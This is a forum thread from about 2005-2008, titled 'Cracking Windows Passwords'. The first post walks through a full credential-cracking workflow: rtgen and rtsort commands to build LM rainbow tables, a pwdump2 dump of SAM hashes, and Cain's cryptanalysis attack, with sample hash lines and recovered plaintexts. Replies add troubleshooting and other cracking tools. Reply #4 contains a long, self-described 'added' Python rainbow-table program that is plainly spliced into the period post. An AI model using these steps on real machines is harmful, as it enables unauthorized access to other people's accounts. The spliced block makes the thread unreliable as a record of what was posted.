Bombshock Forums > Fringe Topics > Electronics, Spy Tech and Communication
[How to] Cracking Windows Passwords
#1  08-15-2005, 04:08 PM
Biovore (Member; Join Date: Jul 2005; Location: Australia; Posts: 52)

------------------------------
CRACKING WINDOWS PASSWORDS
------------------------------

Biovore -- http://www.rorta.net


Well, after much umming and aahing, I bring to you the first part of hacking Windows passwords of up to 14 characters in a few seconds.

------------------------------
Tool kit:
------------------------------

Rainbow Crack
pwdump2
Cain & Abel

------------------------------
Cliff steps:
------------------------------

1) Generate rainbow tables

2) Dump sam and system file

3) Use cain to crack password via rainbow tables

Yes, it is THAT simple.

------------------------------
MORE DETAIL:
------------------------------

Rainbow tables, what are they? Well, think of them as large files of random passwords already computed.

You can read more here:

http://www.antsight.com/zsl/rainbowcrack/

Anyways fire up rtgen and get some tables....

rtgen is a program which will generate rainbow chains, which then combine to make a rainbow table.

Here are the bat files for you lazy people:

Code:
rem config 1
rtgen lm alpha 1 7 0 2100 8000000 all
rtgen lm alpha 1 7 1 2100 8000000 all
rtgen lm alpha 1 7 2 2100 8000000 all
rtgen lm alpha 1 7 3 2100 8000000 all
rtgen lm alpha 1 7 4 2100 8000000 all
and

Code:
rem config 2
rtgen lm alpha-numeric 1 7 0 2400 40000000 all
rtgen lm alpha-numeric 1 7 1 2400 40000000 all
rtgen lm alpha-numeric 1 7 2 2400 40000000 all
rtgen lm alpha-numeric 1 7 3 2400 40000000 all
rtgen lm alpha-numeric 1 7 4 2400 40000000 all
Config 1 should take 12-24 hrs to generate depending on your machine, maybe even 36 hrs. It will use 610 MB of disk space.

Config 2 should take around 5 days to generate and use 3 gigs of HDD space.

Coming soon will be config 3, which will take 18 gigs of space... :O

So, config 1 will be able to crack 99.904% of passwords that ONLY have alpha characters in a few seconds. I will be using these tables for the tut, as I imagine most of you don't want to spend 5 days on rtgen.

Also, you will need to sort the files to make them more efficient.

This is done via rtsort:

Code:
rem config 1
rtsort lm_alpha#1-7_0_2100x8000000_all.rt
rtsort lm_alpha#1-7_1_2100x8000000_all.rt
rtsort lm_alpha#1-7_2_2100x8000000_all.rt
rtsort lm_alpha#1-7_3_2100x8000000_all.rt
rtsort lm_alpha#1-7_4_2100x8000000_all.rt
Code:
rem config 2
rtsort lm_alpha-numeric#1-7_0_2400x40000000_all.rt
rtsort lm_alpha-numeric#1-7_1_2400x40000000_all.rt
rtsort lm_alpha-numeric#1-7_2_2400x40000000_all.rt
rtsort lm_alpha-numeric#1-7_3_2400x40000000_all.rt
rtsort lm_alpha-numeric#1-7_4_2400x40000000_all.rt


So you have wasted some space, and you go, hmmm, what's next?

Well, we are going to dump the SAM to a file.

The SAM file is a depository for the user names and password hashes for every account on the local machine, or domain if it is a domain controller. That wasn't too hard, was it?

To do this, we are going to use a program called pwdump2.

Run the exe in cmd and issue this command:

Code:
pwdump2 > pass.txt

What that will do is redirect output to a file named pass.txt in the same folder as the program.

Open it up; this is what it will look like:

Code:
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:569fbcadc4ce9874da275e3dd3b3773c:fdcc6716e6ec3388bc0694086538e4f2:::
RORTA:1008:c036412e27c931e297b0668eeca3a3a4:fe31056a1f67c9e149d60851d36d39fe:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:54b4144f22141ce78c44cb2e5b38b852:::
__vmware_user__:1005:aad3b435b51404eeaad3b435b51404ee:839a847853f36b5a0bae94bca6992ea6:::
As you can see I have removed my account and the admin one, so.... note the RORTA one :P

now what?

Well, we will fire up Cain.

In Cain you will see a tab that says Cracking; go to that one...

Now in the leftmost column you can see an NT and NTLM hashes tab; click that one.

Now hit the big plus sign.

Select Import.

Open the pass.txt in your pwdump2 folder.

Highlight the accounts you want to crack and right click.

Select Cryptanalysis attack.

press add table and then import all your rainbow tables...

then START! and wait 10 seconds....

Code:
Reading lm_alpha#1-7_0_2100x8000000_all.rt ...
... 128000000 bytes read in: 5.00 s
Verifying the file... (OK)
Searching for 2 hashes...
Plaintext of c036412e27c931e2 is RORTARU
Plaintext of 97b0668eeca3a3a4 is LES
Cryptanalysis time: 4.44 s

Username	Password
------------------------------------------
RORTA         	RORTARULES
Let's have a little look at the output here:

As you can see 2 hashes were loaded; that's because LM can only store 7 chars in each hash. The pass was 10 chars, so 7 in 1 hash and 3 in the other...

This time, I went to a website that generated, and I quote, "secure passwords". Well, let's see how secure it is now....

Code:
Reading lm_alpha#1-7_0_2100x8000000_all.rt ...
... 128000000 bytes read in: 4.42 s
Verifying the file... (OK)
Searching for 2 hashes...
Plaintext of 4dcb7b0d5742450d is RLUPRI
Cryptanalysis time: 5.02 s

Reading lm_alpha#1-7_1_2100x8000000_all.rt ...
... 128000000 bytes read in: 4.66 s
Verifying the file... (OK)
Searching for 1 hash...
Cryptanalysis time: 3.91 s

Reading lm_alpha#1-7_2_2100x8000000_all.rt ...
... 128000000 bytes read in: 5.19 s
Verifying the file... (OK)
Searching for 1 hash...
Plaintext of e6ea64de82fd05a1 is WIAXOED
Cryptanalysis time: 0.49 s

Username	Password
------------------------------------------
secure        	WIAXOEDRLUPRI
Doesn't seem overly secure to me....


Stickied by Synch, k thx.

#2  08-16-2005, 03:16 AM
Dr_Zaius (Member; Join Date: Jul 2005; Posts: 32)

Excellent, I've always wondered about generating rainbow tables; it's a much better option than brute-forcing the hash.

#3  08-16-2005, 04:12 PM
Synchronium (Super Moderator; Join Date: Jul 2005; Location: UK; Posts: 1,047)

But that's almost what a rainbow table is.

Every possible combination of chars (up to a limit). Only with a table, you store these generated strings and query the table rather than generating and trying the string on the fly.

This way means you create all possible combos once, then refer to them for each hash rather than recreating and retrying every one of them for each hash.
__________________
My Shop: http://www.coffeesh0p.com
My Blog: http://www.synchronium.net
Record your Salvia experiences: http://www.salvia-trip.net

#4  08-16-2005, 04:55 PM
Biovore (Member; Join Date: Jul 2005; Location: Australia; Posts: 52)

Time-memory trade-off is a different technique to brute forcing. IF you want to get pedantic about it, all password cracking is taking a source hash and seeing if it matches the cipher hash, whether it is generated in real time, stored in a table, or a dictionary.

Oechslin's method of precomputation uses fewer requests and fewer generated hashes than what Hellman's earlier method suggested, which was aimed more at storing a brute force attack for later. There have been some suggestions that to store all the hashes via Hellman's method, it would take around a terabyte or so. Using Oechslin's method the size is around 120 GB of space.

Get used to precomputation, it's here to stay; with power and plentiful storage space, anything is possible.
__________________
[url]http://www.rorta.net[/url]
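The trade-off that #3 and #4 describe (compute the chains once, store only their start and end points, then search the stored table for each hash) in runnable form. This is an added example, not code from this thread, from RainbowCrack or from Cain, and every value in it is constructed: SHA-256 truncated to 8 bytes stands in for the unsalted LM hash, the keyspace is three lowercase letters (17576 plaintexts), and 2000 chains of 16 steps are enough to cover most of it. The three functions line up with the three steps in the first post: generate_table is rtgen plus rtsort (chains, then a sort by endpoint so the lookup can binary-search), and lookup is what Cain does when you press START. The column-dependent reduction function is the Oechslin detail #4 mentions; the last line of the demo shows why a salted hash falls outside any precomputed table.

```python
"""Toy rainbow table: the time-memory trade-off behind rtgen, rtsort and the Cain lookup.

Added example, not code from the thread, RainbowCrack or Cain. All values are
constructed for illustration: SHA-256 truncated to 8 bytes stands in for the
LM hash, the keyspace is three lowercase letters, and the table is tiny.
"""
import bisect
import hashlib
import string

ALPHABET = string.ascii_lowercase          # charset (toy: lowercase only)
PLAINTEXT_LEN = 3                          # fixed plaintext length (toy)
KEYSPACE = len(ALPHABET) ** PLAINTEXT_LEN  # 26^3 = 17576 candidate plaintexts
CHAIN_LEN = 16                             # rtgen's rainbow_chain_length (toy value)
CHAIN_COUNT = 2000                         # rtgen's rainbow_chain_count (toy value)


def toy_hash(plaintext: str) -> bytes:
    """Stand-in for LM: unsalted and deterministic, so one table serves every target."""
    return hashlib.sha256(plaintext.encode()).digest()[:8]


def index_to_plaintext(index: int) -> str:
    """Map 0 .. KEYSPACE-1 onto a plaintext; chain start points are taken in this order."""
    chars = []
    for _ in range(PLAINTEXT_LEN):
        index, digit = divmod(index, len(ALPHABET))
        chars.append(ALPHABET[digit])
    return "".join(reversed(chars))


def reduce_hash(digest: bytes, column: int) -> str:
    """Reduction function R_i: hash -> a plaintext in the keyspace.

    Mixing in the column number is Oechslin's change to Hellman's chains:
    two chains that collide in different columns no longer merge.
    """
    return index_to_plaintext((int.from_bytes(digest, "big") + column) % KEYSPACE)


def generate_table():
    """rtgen step: walk each chain, keep only (endpoint, start); then rtsort: sort by endpoint."""
    chains = []
    for i in range(CHAIN_COUNT):
        start = index_to_plaintext(i)
        current = start
        for column in range(CHAIN_LEN):
            current = reduce_hash(toy_hash(current), column)
        chains.append((current, start))
    chains.sort()  # sorted by endpoint, so lookups can binary-search
    return chains


def lookup(table, target: bytes):
    """Cain/rcrack step: return a plaintext whose hash is `target`, or None.

    Guess that the target sits in column j, finish the chain from there and
    binary-search the endpoint. On a hit, regenerate that chain from its
    start point and confirm the hash really appears in column j (otherwise it
    was a false alarm from a merged chain and the search continues).
    """
    endpoints = [end for end, _ in table]
    for column in range(CHAIN_LEN - 1, -1, -1):
        current = reduce_hash(target, column)
        for later in range(column + 1, CHAIN_LEN):
            current = reduce_hash(toy_hash(current), later)
        pos = bisect.bisect_left(endpoints, current)
        while pos < len(table) and table[pos][0] == current:
            candidate = table[pos][1]
            for col in range(column):
                candidate = reduce_hash(toy_hash(candidate), col)
            if toy_hash(candidate) == target:
                return candidate
            pos += 1
    return None


def coverage(table, stride: int = 97) -> float:
    """Fraction of a fixed sample of the keyspace (every `stride`-th plaintext) the table recovers."""
    sample = [index_to_plaintext(i) for i in range(0, KEYSPACE, stride)]
    hits = sum(1 for p in sample if lookup(table, toy_hash(p)) == p)
    return hits / len(sample)


if __name__ == "__main__":
    table = generate_table()
    print(f"stored {len(table)} chain ends for a keyspace of {KEYSPACE} plaintexts")
    print(f"sampled coverage: {coverage(table):.0%}")
    print("lookup of hash('qzx') ->", lookup(table, toy_hash("qzx")))
    # A salt changes the string that gets hashed, so no precomputed table of
    # 3-letter plaintexts can contain it; every salt value would need its own table.
    print("lookup of hash('s1:qzx') ->", lookup(table, toy_hash("s1:qzx")))
```

The table stores 2000 pairs for a space of 17576 plaintexts and still recovers roughly three quarters of a sample, which is the whole point of the trade-off: the 610 MB of config 1 in the first post buys a few seconds per hash instead of a full 26^7 brute force each time. The same mechanics also show the defence: LM is unsalted and case-insensitive, so one table works against every machine, while a per-user salt would force a separate table per salt value.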

#5  08-16-2005, 08:56 PM
Synchronium (Super Moderator; Join Date: Jul 2005; Location: UK; Posts: 1,047)

Couldn't agree more.

In fact, I made a PHP bot that worked with MD5 to look up a rainbow table (albeit a small one) for use in IRC.

Also allowed people to say a word to it and it'd return the MD5 hash to them of that word and quietly add it to the database, allowing it to grow and grow.

Since I have 100 GB of space lying around, might be worth setting it up again.

#6  08-18-2005, 01:51 AM
The Butcher (Junior Member; Join Date: Aug 2005; Posts: 1)

I have heard of the time-memory trade-off technique before, and after reading this topic I thought I'd give it a try. Everything worked like it was supposed to, except for pwdump2. Every time I try to run it from CMD it says pwdump2 is not recognized as an internal command, operable batch file or program. And when I click on the pwdump icon it just flashes up and disappears. Any help would be greatly appreciated. Thanks

#7  08-18-2005, 09:06 AM
Synchronium (Super Moderator; Join Date: Jul 2005; Location: UK; Posts: 1,047)

Navigate to the folder it's in...

For example, John The Ripper, another cracker, runs with the command "john" through console, but to actually get it to work I have to:
Code:
cd "C:\Program Files\JohnTheRipper\john-16\run"
Which takes me to that directory. Using the command "john" in console now works fine.

I imagine you have a similar problem.

#8  05-06-2007, 11:33 PM
Wally (Junior Member; Join Date: Mar 2007; Posts: 12)

great.......now how would I do that in 75 minutes or less?

#9  06-17-2007, 04:06 AM
Shorty Tubbs (Junior Member; Join Date: Jun 2007; Location: US; Posts: 20)

How about pwdump2 then John the Ripper?
__________________
"The political arena leaves one no alternative, one must either be a dunce or a rogue" -Emma Goldman

#10  07-16-2007, 08:30 AM
an0nym0us (Junior Member; Join Date: Jul 2007; Posts: 6)

Ophcrack!

#11  07-24-2008, 07:58 AM
Darkshadow666 (Banned; Join Date: Jul 2008; Location: Nowhere.; Posts: 113)

Cool, rainbow keys go pretty fast on a quad core processor.

#12  07-28-2008, 06:55 PM
jbockmon (Junior Member; Join Date: Jul 2008; Posts: 9)

Wouldn't it be easier to just download the Ophcrack LiveCD ISO from SourceForge and burn it onto a disk, then restart your PC and let it boot into Linux and crack the passwords?

#13  10-07-2008, 04:01 AM
Marty_Freak (Junior Member; Join Date: Aug 2008; Location: in a house; Posts: 12)
There's An EZier Way

My friend had his laptop give him some troubles and reset his password (to who knows what), and his dad gave him a disk and he was able to boot it up from the disk and reset it to whatever he wanted. Now his dad works for *unnamed computer corp.* and he had it all set and ready to go within 30 seconds with the disk. I'll see if I can find out what it's called or if I can get a copy to upload it. I used Cain before, and not a big fan.
__________________
"People think it must be fun to be a super genius, but they don't realize how hard it is to put up with all the idiots in the world,"

#14  10-25-2008, 02:12 AM
hellsgateman (Banned; Join Date: Jun 2008; Location: center of the abyss; Posts: 122)

Where do I get the software?